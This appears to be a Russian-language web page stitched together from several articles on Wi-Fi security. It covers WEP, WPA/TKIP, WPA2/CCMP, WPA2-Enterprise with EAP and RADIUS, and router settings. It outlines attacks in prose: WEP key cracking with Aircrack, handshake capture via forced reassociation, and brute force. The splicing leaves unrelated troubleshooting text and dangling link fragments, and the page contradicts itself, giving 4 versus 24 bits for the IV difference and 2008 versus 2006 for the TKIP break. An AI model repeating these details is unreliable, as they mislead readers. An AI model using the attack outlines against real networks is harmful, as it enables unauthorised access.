Wpa wpa2 psk: WPA и WPA2 PSK – что это такое, какой ключ шифрования лучше

Содержание

WPA и WPA2 PSK – что это такое, какой ключ шифрования лучше

Преимущества WPA перед WEP

WPA, WiFi Protected Access – новый, самый современный, на данный момент, механизм защиты беспроводных сетей от неавторизованного доступа. WPA, и его дальнейшее развитие WPA2 пришло на замену механизму WEP, который начал устаревать к тому времени. Еще раз, рассмотрим принцип действия WEP: 1. Кадр данных состоит из зашифрованной и незашифрованной части. Зашифрованная часть сдержит в себе данные и контрольную суммы(CRC32), незашифрованная – вектор инициализации и идентификатор ключа. 2. Каждый кадр данных шифруется поточным шифром RC4, используя в качестве ключа шифрования вектор инициализации с присоединенным к нему ключом WEP. Таким образом, для каждого кадра данных генерируется свой ключ шифрования, однако в то же время каждый новый ключ шифрования отличается от другого всего лишь на вектор инициализации. (24 бита, когда длина ключа может быть 40 либо 104 бит)Таким образом, если злоумышленник перехватит большое количество пакетов, то он получит следующее:-большое количество векторов инициализации -большое количество зашифрованных данных -ключ шифрования для каждого последующего кадра отличается от предыдущего всего на 4 бита(длина вектора инициализации) Таким образом, есть возможность извлечения ключа путем выполнения математических операций над пакетами. Для того, чтобы успешно получить ключ WEP, злоумышленнику необходимо следующее: -находиться в том месте, где есть возможность приема сигнала сети(вполне хватит RSSI в -85 dBm) -захватить около 100-200 тыс. векторов инициализации, в зависимости от длины ключа(WEP-40 или WEP-104). Обычно, для этого нужно перехватить 25-50 Мб трафика, передающегося в сети. При наличии высокой сетевой активности (загрузка файлов ( особенно с использованием пиринговых сетей) видеоконференции), для захвата необходимого объема трафика хватит 5-10 минут. Также обратите внимание на то, как злоумышленник выполняет захват трафика. Обычно, беспроводные сетевые адаптеры работают в нормальном режиме – принимают только те пакеты, которые посланы на их MAC-адрес, при условии, что они подключены к этой беспроводной сети. Однако, физически ни что не мешает беспроводному сетевому адаптеру захватывать все пакеты, которые есть в радиусе его действия на выбранном канале. Для реализации такой возможности существуют специальные неофициальные драйвера и программное обеспечение. Больше того, такое программное обеспечение продается вполне легально, и оно используется для мониторинга беспроводных сетей. Примером такой программы может служить CommView for WiFi компании TamoSoft. Далее злоумышленник выполняет анализ захваченного трафика. Поскольку WEP был взломан уже много лет назад, то в интернете можно найти утилиты, которые в автоматическом режиме извлекают ключ из CAP-файла с трафиком, самой распространенной среди них является Aircrack. Таким образом, WEP имеет следующие минусы -предсказуемость ключа шифрования для кадра -отсутствие средств аутентификации в сети -слабый механизм проверки целостности данных Поэтому многие предприятия отказывались от использования беспроводных сетей вообще, чтобы избежать утечку корпоративной информации. Однако с появлением WPA, а в последствии WPA2 ситуация изменилась, и все больше и больше корпоративных пользователей стали использовать WPA. Действительно, в сравнении с WEP он обладает рядом преимуществ: -математическая независимость друг от друга ключей шифрования для каждого пакета -новый механизм подсчета контрольной суммы -WPA включает в себя средства аутентификации протокола 802.1Х

Принцип работы WPA

Первые модификации WPA представляли собой усовершенствованный WEP. Рассмотрим один из первых протоколов WPA, WPA-TKIP В нем используется 48-битный вектор инициализации, и изменены правила построения вектора, также для подсчета контрольной суммы используется MIC (Message Integrity Code), который используется вместо устаревшего и менее надёжного CRC32 И самым главным усовершенствованием является то, что длина ключа шифрования теперь составляет 128 бит, вместо 40. Для управления ключами существует специальная иерархия, которая призвана предотвратить предсказуемость ключа шифрования для каждого кадра. Благодаря TKIP ключ шифрования для каждого кадра данных генерируется таким образом, что они не повторяют друг друга, пусть даже частично. Таким образом, WPA-сети полностью защищены от атак replay (повторение ключей) и forgery (подмена содержимого пакетов), чего нельзя было сказать о WEP, где было возможно обойти CRC32-проверку контрольной суммы, а также отослать кадр с точно таким же ключом шифрования, как и у предыдущего. Вместе с этим, в WPA были интегрированы механизмы проверки подлинности: EAP, а также осуществляется полная поддержка 802.1Х стандартов для проверки подлинности. EAP — Extensible Authentication Protocol, один из самых распространенных протоколов проверки подлинности. Используется для аутентификации в проводных сетях, и поэтому WPA-беспроводная сеть легко интегрируема в уже имеющуюся инфраструктуру. Обязательным условием аутентификации является предъявление пользователем маркера доступа, подтверждающего его право на доступ в сеть. Для получения маркера выполняется запрос к специальной базе данных, а без аутентификации работа в сети для пользователя будет запрещена. Система проверки расположена на специальном RADIUS-сервере, а в качестве базы данных используется Active Directory(в Windows-системах) Таким образом, WPA является синтезом следующих технологий и стандартов: WPA = 802.1X + EAP + TKIP + MIC Тем не менее, TKIP защита была взломана частично, в 2008 году. Для ее успешного обхода необходимо, чтобы в беспроводном маршрутизаторе использовался QoS. Злоумышленник может получить возможность перехватывать и расшифровывать данные, передаваемые в сети, а также подделывать пакеты, передаваемые в сети. Поэтому был разработан механизм WPA2, представляющий собой усовершенствованный WPA.

Пароль для сети

После того, как мы выбрали режимы безопасности, нам необходимо задуматься о пароле. Каким он должен быть?

Определимся с величиной – 8-32 символа. Используется только латиница, цифры и специальные символы. Обязательным условием является недопустимость пробелов. Пароль реагирует на регистр. Лучше придумать надежный и легко запоминающийся пароль, чтобы его никто не мог взломать.

Теперь вы с уверенностью можете сказать, какой способ проверки подлинности Wi-Fi лучше. Чтобы к вам не мог подключиться любой нежелательный пользователь, нужно защитить свою сеть.

Если статья была полезной, ставьте звездочки! Задавайте вопросы и делитесь опытом по теме! Всем спасибо и до новых встреч на WiFi Гид!

Принцип работы WPA2

Нахождение уязвимостей в WPA привело к тому, что были создан метод защиты WPA2. Существенным отличием его от WPA является то, что трафик в сети шифруется не только от устройств, не подключенных к этой сети, но и друг от друга. Иными словами, каждое устройство имеет свои ключи шифрования для обмена данными с точкой доступа. В сети существует несколько ключей шифрования: 1) Pairwise Transient Key (PTK). При помощи данного типа ключа шифруется личный трафик каждого клиента. Таким образом, обеспечивается защита сети «изнутри», чтобы один клиент, авторизованный в сети, не мог перехватить трафик другого. 2)Group Temporal Key (GTK). Данный ключ шифрует широковещательные данные. WPA2 используется в качестве алгоритма шифрования CCMP

CCMP(Counter Mode with Cipher Block Chaining Message Authentication Code Protocol), протокол блочного шифрования с кодом аутентичности сообщения и режимом сцепления блоков и счётчика – протокол шифрования для сети WPA2, использующий алгоритм AES как основу для шифрования данных. В соответствии со стандартом FIPS-197 используется 128-битный ключ шифрования. Основное отличие от TKIP и WEP – это централизованное управление целостностью пакетов, которое выполняется на уровне AES. Структура пакета, зашифрованного CCMP

Пакет CCMP увеличен на 16 октетов. Заголовок CCMP состоит из трех частей: PN(номер пакета, 48-разрядный), ExtIV(вектор инициализации), и идентификатора ключа. Инкапсуляция данных с использованием CCMP: 1)Номер пакета увеличивается на некое число, чтобы избежать повторения пакетов 2)Создаются дополнительные аутентификационные данные 3)Создается служебное поле nonce 4)Номер пакета и идентификатор ключа помещаются в заголовок пакета 5)Поле nonce и дополнительные аутентификационные данные шифруются с использованием временного ключа. Декапсуляция данных с использованием CCMP: 1)Создаются поля дополнительных идентификационных данных и поле nonce с использованием данных пакета. 2)Поле дополнительных идентификационных данных извлекается из заголовка зашифрованного пакета 3)Извлекается поле А2, номер пакета и поле приоритета 4)Извлекается поле MIC 5)Выполняется расшифровка пакета и проверка его целостности, с использованием шифротекста пакета, дополнительных идентификационных данных, временного ключа и собственно MIC 6)Выполняется сборка пакета в расшифрованном виде. 7)Пакеты с повторяющимся номером отбрасываются Данный метод шифрования в сети на данный момент является наиболее надежным.

WPA2-Enterprise, или правильный подход к безопасности Wi-Fi сети

В последнее время появилось много «разоблачающих» публикаций о взломе какого-либо очередного протокола или технологии, компрометирующего безопасность беспроводных сетей. Так ли это на самом деле, чего стоит бояться, и как сделать, чтобы доступ в вашу сеть был максимально защищен? Слова WEP, WPA, 802.1x, EAP, PKI для вас мало что значат? Этот небольшой обзор поможет свести воедино все применяющиеся технологии шифрования и авторизации радио-доступа. Я попробую показать, что правильно настроенная беспроводная сеть представляет собой непреодолимый барьер для злоумышленника (до известного предела, конечно).

Основы

Любое взаимодействие точки доступа (сети), и беспроводного клиента, построено на:

  • Аутентификации
    — как клиент и точка доступа представляются друг другу и подтверждают, что у них есть право общаться между собой;
  • Шифровании
    — какой алгоритм скремблирования передаваемых данных применяется, как генерируется ключ шифрования, и когда он меняется.

Параметры беспроводной сети, в первую очередь ее имя (SSID), регулярно анонсируются точкой доступа в широковещательных beacon пакетах. Помимо ожидаемых настроек безопасности, передаются пожелания по QoS, по параметрам 802.11n, поддерживаемых скорости, сведения о других соседях и прочее. Аутентификация определяет, как клиент представляется точке. Возможные варианты:

  • Open
    — так называемая открытая сеть, в которой все подключаемые устройства авторизованы сразу
  • Shared
    — подлинность подключаемого устройства должна быть проверена ключом/паролем
  • EAP
    — подлинность подключаемого устройства должна быть проверена по протоколу EAP внешним сервером

Открытость сети не означает, что любой желающий сможет безнаказанно с ней работать. Чтобы передавать в такой сети данные, необходимо совпадение применяющегося алгоритма шифрования, и соответственно ему корректное установление шифрованного соединения. Алгоритмы шифрования таковы:

  • None
    — отсутствие шифрования, данные передаются в открытом виде
  • WEP
    — основанный на алгоритме RC4 шифр с разной длиной статического или динамического ключа (64 или 128 бит)
  • CKIP
    — проприетарная замена WEP от Cisco, ранний вариант TKIP
  • TKIP
    — улучшенная замена WEP с дополнительными проверками и защитой
  • AES/CCMP
    — наиболее совершенный алгоритм, основанный на AES256 с дополнительными проверками и защитой

Комбинация Open Authentication, No Encryption

широко используется в системах гостевого доступа вроде предоставления Интернета в кафе или гостинице. Для подключения нужно знать только имя беспроводной сети. Зачастую такое подключение комбинируется с дополнительной проверкой на Captive Portal путем редиректа пользовательского HTTP-запроса на дополнительную страницу, на которой можно запросить подтверждение (логин-пароль, согласие с правилами и т.п).

Шифрование WEP

скомпрометировано, и использовать его нельзя (даже в случае динамических ключей).

Широко встречающиеся термины WPA

и
WPA2
определяют, фактически, алгоритм шифрования (TKIP либо AES). В силу того, что уже довольно давно клиентские адаптеры поддерживают WPA2 (AES), применять шифрование по алгоритму TKIP нет смысла.

Разница между WPA2 Personal

и
WPA2 Enterprise
состоит в том, откуда берутся ключи шифрования, используемые в механике алгоритма AES. Для частных (домашних, мелких) применений используется статический ключ (пароль, кодовое слово, PSK (Pre-Shared Key)) минимальной длиной 8 символов, которое задается в настройках точки доступа, и у всех клиентов данной беспроводной сети одинаковым. Компрометация такого ключа (проболтались соседу, уволен сотрудник, украден ноутбук) требует немедленной смены пароля у всех оставшихся пользователей, что реалистично только в случае небольшого их числа. Для корпоративных применений, как следует из названия, используется динамический ключ, индивидуальный для каждого работающего клиента в данный момент. Этот ключ может периодический обновляться по ходу работы без разрыва соединения, и за его генерацию отвечает дополнительный компонент — сервер авторизации, и почти всегда это RADIUS-сервер.

Все возможные параметры безопасности сведены в этой табличке:

СвойствоСтатический WEPДинамический WEPWPAWPA 2 (Enterprise)
ИдентификацияПользователь, компьютер, карта WLANПользователь, компьютерПользователь, компьютерПользователь, компьютер
АвторизацияОбщий ключEAPEAP или общий ключEAP или общий ключ
Целостность32-bit Integrity Check Value (ICV)32-bit ICV64-bit Message Integrity Code (MIC)CRT/CBC-MAC (Counter mode Cipher Block Chaining Auth Code — CCM) Part of AES
ШифрованиеСтатический ключСессионный ключПопакетный ключ через TKIPCCMP (AES)
РАспределение ключейОднократное, вручнуюСегмент Pair-wise Master Key (PMK)Производное от PMKПроизводное от PMK
Вектор инициализацииТекст, 24 битаТекст, 24 битаРасширенный вектор, 65 бит48-бит номер пакета (PN)
АлгоритмRC4RC4RC4AES
Длина ключа, бит64/12864/128128до 256
Требуемая инфраструктураНетRADIUSRADIUSRADIUS

Если с WPA2 Personal (WPA2 PSK) всё ясно, корпоративное решение требует дополнительного рассмотрения.

WPA2 Enterprise


Здесь мы имеем дело с дополнительным набором различных протоколов. На стороне клиента специальный компонент программного обеспечения, supplicant (обычно часть ОС) взаимодействует с авторизующей частью, AAA сервером. В данном примере отображена работа унифицированной радиосети, построенной на легковесных точках доступа и контроллере. В случае использования точек доступа «с мозгами» всю роль посредника между клиентов и сервером может на себя взять сама точка. При этом данные клиентского суппликанта по радио передаются сформированными в протокол 802.1x (EAPOL), а на стороне контроллера они оборачиваются в RADIUS-пакеты.
Применение механизма авторизации EAP в вашей сети приводит к тому, что после успешной (почти наверняка открытой) аутентификации клиента точкой доступа (совместно с контроллером, если он есть) последняя просит клиента авторизоваться (подтвердить свои полномочия) у инфраструктурного RADIUS-сервера:

Использование WPA2 Enterprise

требует наличия в вашей сети RADIUS-сервера. На сегодняшний момент наиболее работоспособными являются следующие продукты:

  • Microsoft Network Policy Server (NPS), бывший IAS
    — конфигурируется через MMC, бесплатен, но надо купить винду
  • Cisco Secure Access Control Server (ACS) 4.2, 5.3
    — конфигурируется через веб-интерфейс, наворочен по функционалу, позволяет создавать распределенные и отказоустойчивые системы, стоит дорого
  • FreeRADIUS
    — бесплатен, конфигурируется текстовыми конфигами, в управлении и мониторинге не удобен

При этом контроллер внимательно наблюдает за происходящим обменом информацией, и дожидается успешной авторизации, либо отказа в ней. При успехе RADIUS-сервер способен передать точке доступа дополнительные параметры (например, в какой VLAN поместить абонента, какой ему присвоить IP-адрес, QoS профиль и т.п.). В завершении обмена RADIUS-сервер дает возможность клиенту и точке доступа сгенерировать и обменяться ключами шифрования (индивидуальными, валидными только для данной сеcсии):

EAP

Сам протокол EAP является контейнерным, то есть фактический механизм авторизации дается на откуп внутренних протоколов. На настоящий момент сколько-нибудь значимое распространение получили следующие:

  • EAP-FAST
    (Flexible Authentication via Secure Tunneling) — разработан фирмой Cisco; позволяет проводить авторизацию по логину-паролю, передаваемому внутри TLS туннеля между суппликантом и RADIUS-сервером
  • EAP-TLS
    (Transport Layer Security). Использует инфраструктуру открытых ключей (PKI) для авторизации клиента и сервера (суппликанта и RADIUS-сервера) через сертификаты, выписанные доверенным удостоверяющим центром (CA). Требует выписывания и установки клиентских сертификатов на каждое беспроводное устройство, поэтому подходит только для управляемой корпоративной среды. Сервер сертификатов Windows имеет средства, позволяющие клиенту самостоятельно генерировать себе сертификат, если клиент — член домена. Блокирование клиента легко производится отзывом его сертификата (либо через учетные записи).
  • EAP-TTLS
    (Tunneled Transport Layer Security) аналогичен EAP-TLS, но при создании туннеля не требуется клиентский сертификат. В таком туннеле, аналогичном SSL-соединению браузера, производится дополнительная авторизация (по паролю или как-то ещё).
  • PEAP-MSCHAPv2
    (Protected EAP) — схож с EAP-TTLS в плане изначального установления шифрованного TLS туннеля между клиентом и сервером, требующего серверного сертификата. В дальнейшем в таком туннеле происходит авторизация по известному протоколу MSCHAPv2
  • PEAP-GTC
    (Generic Token Card) — аналогично предыдущему, но требует карт одноразовых паролей (и соответствующей инфраструктуры)

Все эти методы (кроме EAP-FAST) требуют наличия сертификата сервера (на RADIUS-сервере), выписанного удостоверяющим центром (CA). При этом сам сертификат CA должен присутствовать на устройстве клиента в группе доверенных (что нетрудно реализовать средствами групповой политики в Windows). Дополнительно, EAP-TLS требует индивидуального клиентского сертификата. Проверка подлинности клиента осуществляется как по цифровой подписи, так (опционально) по сравнению предоставленного клиентом RADIUS-серверу сертификата с тем, что сервер извлек из PKI-инфраструктуры (Active Directory).

Поддержка любого из EAP методов должна обеспечиваться суппликантом на стороне клиента. Стандартный, встроенный в Windows XP/Vista/7, iOS, Android обеспечивает как минимум EAP-TLS, и EAP-MSCHAPv2, что обуславливает популярность этих методов. С клиентскими адаптерами Intel под Windows поставляется утилита ProSet, расширяющая доступный список. Это же делает Cisco AnyConnect Client.

Насколько это надежно

В конце концов, что нужно злоумышленнику, чтобы взломать вашу сеть?
Для Open Authentication, No Encryption — ничего. Подключился к сети, и всё. Поскольку радиосреда открыта, сигнал распространяется в разные стороны, заблокировать его непросто. При наличии соответствующих клиентских адаптеров, позволяющих прослушивать эфир, сетевой трафик виден так же, будто атакующий подключился в провод, в хаб, в SPAN-порт коммутатора. Для шифрования, основанного на WEP, требуется только время на перебор IV, и одна из многих свободно доступных утилит сканирования. Для шифрования, основанного на TKIP либо AES прямое дешифрование возможно в теории, но на практике случаи взлома не встречались.

Конечно, можно попробовать подобрать ключ PSK, либо пароль к одному из EAP-методов. Распространенные атаки на данные методы не известны. Можно пробовать применить методы социальной инженерии, либо терморектальный криптоанализ.

Получить доступ к сети, защищенной EAP-FAST, EAP-TTLS, PEAP-MSCHAPv2 можно, только зная логин-пароль пользователя (взлом как таковой невозможен). Атаки типа перебора пароля, или направленные на уязвимости в MSCHAP также не возможны либо затруднены из-за того, что EAP-канал «клиент-сервер» защищен шифрованным туннелем.

Доступ к сети, закрытой PEAP-GTC возможен либо при взломе сервера токенов, либо при краже токена вместе с его паролем.

Доступ к сети, закрытой EAP-TLS возможен при краже пользовательского сертификата (вместе с его приватным ключом, конечно), либо при выписывании валидного, но подставного сертификата. Такое возможно только при компрометации удостоверяющего центра, который в нормальных компаниях берегут как самый ценный IT-ресурс.

Поскольку все вышеозначенные методы (кроме PEAP-GTC) допускают сохранение (кэширование) паролей/сертификатов, то при краже мобильного устройства атакующий получает полный доступ без лишних вопросов со стороны сети. В качестве меры предотвращения может служить полное шифрование жесткого диска с запросом пароля при включении устройства.

Запомните: при грамотном проектировании беспроводную сеть можно очень хорошо защитить; средств взлома такой сети не существует

(до известного предела)

Методы аутентификации в WPA\WPA2

Аутентификация, то есть подтверждение пользователем прав на доступ к ресурсам является обязательным условием работы WPA\WPA2 Для этого в классическую реализацию WAP\WPA2 включена поддержка 802.11 и EAP. Иными словами, для того, чтобы клиентское устройство успешно прошло процесс подключения, необходимо, чтобы оно идентифицировало себя. На практике это выглядит следующим образом: пользователю предлагается ввести логин и пароль для доступа в сеть. Проверка учетных данных выполняется на RADIUS-сервере, который в свою очередь, связывается с сервером аутентификации. В качестве сервера аутентификации используется контроллер домена Windows Server 2008R2, его же используют как RADIUS-сервер. Подобный подход к реализации WPA\WPA2 называется WPA-Enterprise. Он используется в крупных производственных сетях, где уже развернута инфраструктура Active Directory. Однако очевидно, что развертывание Active Directory и RADIUS в условиях малого бизнеса, либо же в домашних условий практически невозможно. Поэтому, чтобы стандарты WPA\WPA2 могли использоваться в домашних условиях, организацией Wi-Fi Alliance была разработана упрощенная реализация, называемая WPA-PSK(Pre-Shared Key). Он использует те же протоколы шифрования, однако схема аутентификации пользователей в нем сильно упрощена. Для того, чтобы устройство получило маркер доступа в сеть, на устройстве необходимо ввести специальную парольную фразу, называемую Pre-Shared Key. Длина должна быть от 8 до 32 символов, притом можно использовать специальные символы, а также символы национальных алфавитов. После ввода парольной фразы она помещается в специальный пакет ассоциации (пакет обмена ключами, handshake), который передается на точку доступа. Если парольная фраза верна, то устройству выдается маркер доступа в сеть. Данный подход в разы проще, чем WPA-Enterprise, и поэтому нашел широкое применение среди малого бизнеса и домашних пользователей.

Шифрование WiFi данных и типы аутентификации

Итак, в необходимости шифрования сети wifi мы убедились, теперь посмотрим, какие бывают типы:

Что такое WEP защита wifi?

WEP (Wired Equivalent Privacy) — это самый первый появившийся стандарт, который по надежности уже не отвечает современным требованиям. Все программы, настроенные на взлом сети wifi методом перебора символов, направлены в большей степени именно на подбор WEP-ключа шифрования.

Что такое ключ WPA или пароль?

WPA (Wi-Fi Protected Access) — более современный стандарт аутентификации, который позволяет достаточно надежно оградить локальную сеть и интернет от нелегального проникновения.

Что такое WPA2-PSK — Personal или Enterprise?

WPA2 — усовершенствованный вариант предыдущего типа. Взлом WPA2 практически невозможен, он обеспечивает максимальную степень безопасности, поэтому в своих статьях я всегда без объяснений говорю о том, что нужно устанавливать именно его — теперь вы знаете, почему.

У стандартов защиты WiFi WPA2 и WPA есть еще две разновидности:

  • Personal, обозначается как WPA/PSK или WPA2/PSK. Этот вид самый широко используемый и оптимальный для применения в большинстве случаев — и дома, и в офисе. В WPA2/PSK мы задаем пароль из не менее, чем 8 символов, который хранится в памяти того устройства, которые мы подключаем к роутеру.
  • Enterprise — более сложная конфигурация, которая требует включенной функции RADIUS на роутере. Работает она по принципу DHCP сервера, то есть для каждого отдельного подключаемого гаджета назначается отдельный пароль.

Типы шифрования WPA — TKIP или AES?

Итак, мы определились, что оптимальным выбором для обеспечения безопасности сети будет WPA2/PSK (Personal), однако у него есть еще два типа шифрования данных для аутентификации.

  • TKIP — сегодня это уже устаревший тип, однако он все еще широко употребляется, поскольку многие девайсы энное количество лет выпуска поддерживают только его. Не работает с технологией WPA2/PSK и не поддерживает WiFi стандарта 802.11n.
  • AES — последний на данный момент и самый надежный тип шифрования WiFi.

Уязвимости в WPA\WPA2

При всех своих достоинствах, WPA\WPA2 не лишен уязвимостей. Начнем с того, что еще в 2006 году TKIP-шифрование в WPA было взломано. Эксплоит позволяет прочитать данные, передаваемые от точки доступа клиентской машине, а также передавать поддельную информацию на клиентскую машину. Для реализации этой атаки необходимо, чтобы в сети использовался QoS. Поэтому я также не рекомендую использовать WPA для защиты вашей беспроводной сети. Конечно, взломать его сложнее, нежели WEP, и WPA защитит вас от атаки школьников с Aircrack, однако, он не устоит против целенаправленной атаки на вашу организацию. Для наибольшей защиты я рекомендую использовать WPA2 Однако и WPA2 не лишен уязвимостей. В 2008 году была обнаружена уязвимость, позволяющая провести атаку «человек в центре». Она позволяла участнику сети перехватить и расшифровать данные, передаваемые между другими участниками сети с использованием их Pairwise Transient Key. Поэтому, при работе в такой сети имеет смысл использовать дополнительные средства шифрования передаваемой информации.(ПСКЗИ «Шипка» например) В то же время обратите внимание, что для того, чтобы воспользоваться этой уязвимостью, злоумышленнику необходимо быть авторизованным и подключенным к сети. Однако я бы хотел заострить внимание на «домашней» реализации WPA-PSK. В нем упрощена схема авторизации, таким «узким» местом в нем является сам Pre-Shared Key, поскольку ввод этого ключа дает устройству полный доступ в сеть (если не задействована MAC-фильтрация). Сам ключ хранится в точке доступа. В зависимости от модели и микропрограммного обеспечения устройства, реализуются методы его защиты. В некоторых случаях злоумышленнику достаточно получить доступ в веб-панель управления, и получить Pre-Shared Key, который хранится там открытым текстом. В некоторых случаях, поле с ним защищено, как поле с паролем, но все равно есть возможность его извлечения, если злоумышленник сможет извлечь из устройства микросхему памяти и получить к ней доступ на низком уровне. Поэтому обращайте внимание на физическую защищенность вашего беспроводного оборудования. И наконец, самой последней уязвимостью является возможность перехвата пакетов handshake, в которых передается Pre-Shared Key при подключении устройства к сети. По сколько Pre-Shared key шифруется, у злоумышленника остается только одна возможность – атака грубой силой на захваченные ассоционные пакеты. С одной стороны, это нерационально, но стоит понимать, что для этого совсем не нужно находиться рядом с точкой доступа, и для такой атаки грубой силой(либо словарной) злоумышленник может задействовать большие вычислительные ресурсы. Также стоит обратить внимание, что для того, чтобы перехватить handshake злоумышленнику совсем не обязательно ждать того момента, как к сети будет подключено новое устройство. На некоторых беспроводных адаптерах, при использовании нестандартных драйверов, есть возможность посылки в сеть реассоционных пакетов, которые будут прерывать сетевые соединения и инициировать новый обмен ключами в сети между клиентами и точкой доступа. В таком случае, для того, чтобы захватить требуемые пакеты, необходимо, чтобы к сети был подключен хотя бы один клиент. Также, злоумышленнику необходимо находиться близко от точки доступа, чтобы мощности его адаптера (а такие адаптеры обычно низко чувствительны и маломощны, и сильно перегреваются при работе) хватило для ПОСЫЛКИ пакетов реассоциации (вспомните WEP, где нужно было всего лишь «наловить» достаточный объем трафика). И в конце концов, атака грубой силой занимает много времени, однако использование вычислительного кластера существенно упрощает задачу.

Как выставить правильный регион в настройках маршрутизатора

Обзор и настройка модема D-Link Dir-320

Когда Wi-Fi сеть сохранена, а не подключает, пора влезть в «географию» настроек Wi-Fi. Распространенным методом решения данной проблемы выступает неправильная локация и ее смена. Также, если на гаджете установлен VPN или блокиратор рекламы, это будет влиять на корректное подключение к беспроводным сетям.

Обратите внимание! Подробные сведения о настройках локации необходимо искать в инструкции к роутеру.

Если роутер производителя TP-Link, клиенту придется перейти в пункт беспроводного режима Wireless. Здесь находится вкладка «Регион», напротив которой указывается страна. После этого надо сохраниться.

Надпись «сохранено защищено», но нет доступа в интернет, может быть связана с поврежденной микропрограммой маршрутизатора. Тогда придется обновить его прошивку до последней версии и только с официального сайта производителя. При включении роутера стоит убедиться в том, что сеть открытая. Для этого в конфигурациях нужно поменять (снять галочку) на пункте Hidden SSID, а также проверить корректное название беспроводной сети (SSID на латинице).

Безопасность Wi-Fi: следует ли использовать WPA2-AES, WPA2-TKIP или оба?

Многие маршрутизаторы предоставляют в качестве опций WPA2-PSK (TKIP), WPA2-PSK (AES) и WPA2-PSK (TKIP / AES). Однако выберите неправильный, и у вас будет более медленная и менее защищенная сеть.

Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) и Wi-Fi Protected Access II (WPA2) — это основные алгоритмы безопасности, которые вы увидите при настройке беспроводной сети. WEP является самым старым и доказал свою уязвимость, поскольку обнаруживается все больше и больше недостатков безопасности. WPA улучшил безопасность, но теперь также считается уязвимым для вторжений. WPA2, хотя и не идеален, в настоящее время является наиболее безопасным вариантом. Протокол целостности временного ключа (TKIP) и расширенный стандарт шифрования (AES) — это два разных типа шифрования, которые вы увидите, используемые в сетях, защищенных с помощью WPA2. Давайте посмотрим, чем они отличаются и что лучше всего подходит вам.

СВЯЗАННЫЕ С: Разница между паролями Wi-Fi WEP, WPA и WPA2

AES против TKIP

TKIP и AES — это два разных типа шифрования, которые могут использоваться в сети Wi-Fi. На самом деле TKIP — это более старый протокол шифрования, представленный вместе с WPA, чтобы заменить очень небезопасное шифрование WEP в то время. TKIP на самом деле очень похож на шифрование WEP. TKIP больше не считается безопасным и больше не поддерживается. Другими словами, вам не следует его использовать.

AES — это более безопасный протокол шифрования, представленный в WPA2. AES — это не какой-то скрипучий стандарт, разработанный специально для сетей Wi-Fi. Это серьезный мировой стандарт шифрования, который даже был принят правительством США. Например, когда вы

зашифровать жесткий диск с помощью TrueCrypt , для этого он может использовать шифрование AES. AES обычно считается достаточно безопасным, и его основные недостатки: атаки методом перебора (предотвращается использованием надежной парольной фразы) и недостатки безопасности в других аспектах WPA2 .

СВЯЗАННЫЕ С: Объяснение атак грубой силы: насколько уязвимо все шифрование

Коротко говоря, TKIP — это более старый стандарт шифрования, используемый стандартом WPA. AES — это новое решение для шифрования Wi-Fi, используемое новым и безопасным стандартом WPA2. Теоретически на этом все. Но, в зависимости от вашего маршрутизатора, просто выбирая WPA2 может быть недостаточно хорошо.

Хотя WPA2 должен использовать AES для оптимальной безопасности, он также может использовать TKIP, когда требуется обратная совместимость с устаревшими устройствами. В таком состоянии устройства, поддерживающие WPA2, будут подключаться к WPA2, а устройства, поддерживающие WPA, будут подключаться к WPA. Таким образом, «WPA2» не всегда означает WPA2-AES. Однако на устройствах без видимой опции «TKIP» или «AES» WPA2 обычно является синонимом WPA2-AES.

СВЯЗАННЫЕ С: Предупреждение: зашифрованные сети Wi-Fi WPA2 по-прежнему уязвимы для отслеживания

И если вам интересно, «PSK» в этих именах означает « предварительный общий ключ »- общий ключ обычно является вашей парольной фразой для шифрования. Это отличает его от WPA-Enterprise, который использует сервер RADIUS для выдачи уникальных ключей в более крупных корпоративных или государственных сетях Wi-Fi.

Объяснение режимов безопасности Wi-Fi

Еще не запутались? Мы не удивлены. Но все, что вам действительно нужно сделать, это найти самый безопасный вариант в списке, который работает с вашими устройствами. Вот варианты, которые вы, вероятно, увидите на своем роутере:

СВЯЗАННЫЕ С: Почему не стоит размещать открытую сеть Wi-Fi без пароля

  • Открытый (рискованный) : Открытые сети Wi-Fi не имеют кодовой фразы. Не следует создавать открытую сеть Wi-Fi — серьезно,
    Полиция может взломать вашу дверь
    .
  • WEP 64 (опасно) : Старый стандарт протокола WEP уязвим, и вам действительно не следует его использовать.
  • WEP 128 (опасно) : Это WEP, но с большим размером ключа шифрования. На самом деле он не менее уязвим, чем WEP 64.
  • WPA-PSK (TKIP) : Используется исходная версия протокола WPA (по сути WPA1). Он был заменен WPA2 и небезопасен.
  • WPA-PSK (AES) : Использует исходный протокол WPA, но заменяет TKIP более современным шифрованием AES. Это предлагается в качестве временной меры, но устройства, поддерживающие AES, почти всегда будут поддерживать WPA2, в то время как устройства, которым требуется WPA, почти никогда не будут поддерживать шифрование AES. Так что в этом варианте мало смысла.
  • WPA2-PSK (TKIP) : Здесь используется современный стандарт WPA2 со старым шифрованием TKIP. Это небезопасно, и это хорошая идея, только если у вас есть старые устройства, которые не могут подключиться к сети WPA2-PSK (AES).
  • WPA2-PSK (AES) : Это наиболее безопасный вариант. Он использует WPA2, последний стандарт шифрования Wi-Fi и последний протокол шифрования AES.
    Вам следует использовать эту опцию.
    На некоторых устройствах вы просто увидите вариант «WPA2» или «WPA2-PSK». Если вы это сделаете, он, вероятно, просто будет использовать AES, поскольку это выбор здравого смысла.
  • WPAWPA2-PSK (TKIP / AES) : Некоторые устройства предлагают — и даже рекомендуют — этот вариант смешанного режима. Этот параметр включает как WPA, так и WPA2, с TKIP и AES. Это обеспечивает максимальную совместимость с любыми древними устройствами, которые у вас могут быть, но также позволяет злоумышленнику взломать вашу сеть, взломав более уязвимые протоколы WPA и TKIP.

Сертификация WPA2 стала доступна в 2004 году, десять лет назад. В 2006 году сертификация WPA2 стала обязательной. Любое устройство, выпущенное после 2006 года с логотипом «Wi-Fi», должно поддерживать шифрование WPA2.

Поскольку ваши устройства с поддержкой Wi-Fi, скорее всего, новее 8-10 лет, вы должны будете в порядке, просто выбрав WPA2-PSK (AES). Выберите этот вариант, и тогда вы увидите, что что-то не работает. Если устройство перестает работать, вы всегда можете вернуть его обратно. Хотя, если безопасность является проблемой, вы можете просто купить новое устройство, произведенное с 2006 года.

WPA и TKIP замедляют работу вашего Wi-Fi

СВЯЗАННЫЕ С: Общие сведения о маршрутизаторах, коммутаторах и сетевом оборудовании

